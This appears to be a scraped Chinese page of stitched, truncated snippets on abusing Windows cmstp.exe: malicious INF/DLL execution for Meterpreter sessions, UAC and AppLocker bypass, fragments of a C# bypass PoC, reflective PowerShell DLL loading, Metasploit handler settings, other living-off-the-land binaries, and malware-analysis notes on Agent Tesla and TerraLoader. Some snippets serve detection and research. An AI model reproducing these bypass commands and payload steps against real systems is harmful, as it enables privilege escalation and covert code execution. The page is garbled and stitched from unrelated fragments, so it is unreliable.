CMSTP是一个与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。...当恶意INF文件与cmstp一起提供时,代码将会在后台执行。 ? ? Meterpreter会话将从DLL执行中打开。 ?...SCT 除了DLL文件外,cmstp还能够运行SCT文件,这在红队操作中扩展了二进制的可用性。 Nick Tyrer最初通过Twitter展示了这种能力。...总结 使用CMSTP二进制来绕过Apple限制和代码执行。CMSTP需要INF文件并在执行时生成一个CMP文件,它是连接管理器设置文件。...因此,如果恶意攻击者已经开始使用此技术,且CMSTP.EXE二进制无法被AppLocker规则阻止的情况下,则需要将这两个文件作为IoC进行监视。 ?
现在我们来介绍一下今天的主角cmstp、Empire PowerShell Cmstp简介: Cmstp安装或删除“连接管理器”服务配置文件。...如果不含可选参数的情况下使用,则cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。...Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别 微软官方文档: https://docs.microsoft.com/en-us/windows-server/administration.../windows-commands/cmstp Empire PowerShell简介: Empire PowerShell中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具...现在,将文件改名后发送到受害者的PC,并在受害者的命令提示符下运行以下命令: cmstp.exe /s shell.inf ? 一旦运行该命令,您将获得一个meterprer会话。
无界面安装程序,管理员在线也无法察觉 msiexec /a Any.msi /quiet 1.生成dll文件 2.执行dll文件 msiexec /y Gamma.dll 2.7 白名单Cmstp.exe...Cmstp安装或删除“连接管理器”服务配置文件。...如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。...位置在: C:\Windows\System32\cmstp.exe C:\Windows\SysWOW64\cmstp.exe 如果找不到请cd到c盘根目录下,dir /S cmstp.exe 这里来个例子.../s cmstp.inf 还可以配合ps1脚本bypass uac 参考链接: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ 2.8 白名单
攻击者使用复杂的技术来生成 Paylo 使用 CMSTP 绕过用户账户控制,以便以管理权限执行最终 Payload 并关闭 Windows Defender 利用集成了无文件攻击等多种攻击向量的多阶段感染链...解密后的 PowerShell 脚本是一个 Downloader,通过远程服务器下载 Agent Tesla,再使用 CMSTP 绕过 UAC 以管理权限执行。...该函数最初解码一个特别大的、base64 编码的数据块,如下所示: 【CMSTP UAC Bypass】 解码后的代码是基于 PowerShell 的 CMSTP UAC Bypass PoC,在...基于 PowerShell 的 CMSTP UAC 绕过 PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件,其中 PowerShell 脚本中的 $CommandToExecute变量是...,如下所示: 【恶意 INF 文件作为参数执行 CMSTP】 在 cmstp.exe 安装 INF 文件时,RunPreSetupCommandsSection 参数中的命令将以管理权限执行。
github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html /* UAC Bypass using CMSTP.exe...microsoft binary Based on previous work from Oddvar Moe https://oddvar.moe/2017/08/15/research-on-cmstp-exe...File.Exists(BinaryPath)) { Console.WriteLine("Could not find cmstp.exe binary!")...IntPtr(); windowHandle = IntPtr.Zero; do { windowHandle = SetWindowActive("cmstp..." 将该 dll 加载到内存中 [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
C#代码是以下代码: /* UAC Bypass using CMSTP.exe microsoft binary Based on previous work from Oddvar Moe https...://oddvar.moe/2017/08/15/research-on-cmstp-exe/ And this PowerShell script of Tyler Applebaum https:...bool SetForegroundWindow(IntPtr hWnd); public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe...File.Exists(BinaryPath)) { Console.WriteLine("Could not find cmstp.exe binary!")...IntPtr(); windowHandle = IntPtr.Zero; do { windowHandle = SetWindowActive("cmstp
这里我们利用微软 "cmstp.exe"去绕过UAC 给出脚本链接:https://gist.github.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1...File.Exists(BinaryPath)) { Console.WriteLine("Could not find cmstp.exe binary!")..." 然后我们得到了cmstp-BypassUAC.dll ?...然后我们开始运行加载这个dll,运行如下命令: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\cmstp-BypassUAC.dll...先把我们生成的dll文件进行base64编码,这里我直接使用ubuntu进行的 base64 -i cmstp-BypassUAC.dll ?
---- 基于白名单Cmstp.exe执行Payload上线 Cmstp安装或删除“连接管理器”服务配置文件。...如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。...微软官方文档: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp 首先MSF生成一个...Connection Manager" ServiceName="saul" ShortSvcName="saul" 接着把两个文件,10000.inf和10000.dll上传到目标服务器,运行命令加载上线: cmstp.exe
xx.xx.xx.xx set lport 4444 exploit 运行 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml CMSTP...cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt绕过AppLocker并启动恶意脚本 Mshta.exe
其它的白名单执行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。
wscript.exe:https://github.com/Vozzie/uacscript cmstp.exe:可以参见利用CMSTP.exe实现UAC Bypass和加载DLL 修改环境变量,劫持高权限
TerraLoader可以劫持两个合法的Windows进程cmstp和regsvr32,从而加载名为TerraPreter的最终有效负载。
/Windows/Execution/Rundll32.md Winword 利用Office word 的/l参数来加载dll文件 winword.exe /l dllfile.dll Cmstp...通过安装一个V**配置从Webdav加载DLL,可以参考以下链接 cmstp.exe /ni /s c:\cmstp\CorpV**.inf Links: https://msitpros.com...p=3960 https://www.anquanke.com/post/id/86685 InfDefaultInstall 和cmstp一样用于加载dll InfDefaultInstall.exe
UACBypass -> UAC Magic,基于James Forshaw在UAC上的三篇文章 UAC绕过cmstp技术,作者:Oddvar Moe DiskCleanup UAC旁路,James Forshaw
启动字符映射表 5、chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符) 6、cleanmgr: 打开磁盘清理工具 7、cliconfg:SQL SERVER 客户端网络实用工具 8、cmstp
UAC绕过,使用CMSTP是一个与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码; ? ?
chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符) 6.cleanmgr: 打开磁盘清理工具 7.cliconfg:SQL SERVER 客户端网络实用工具 8.cmstp
通过cmstp执行恶意inf脚本,inf脚本调用powershell从远程服务器下载payload(wdisvcnotifyhost.com/n9brCs21/apprun),最后将其注册为计划任务实现持久化
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
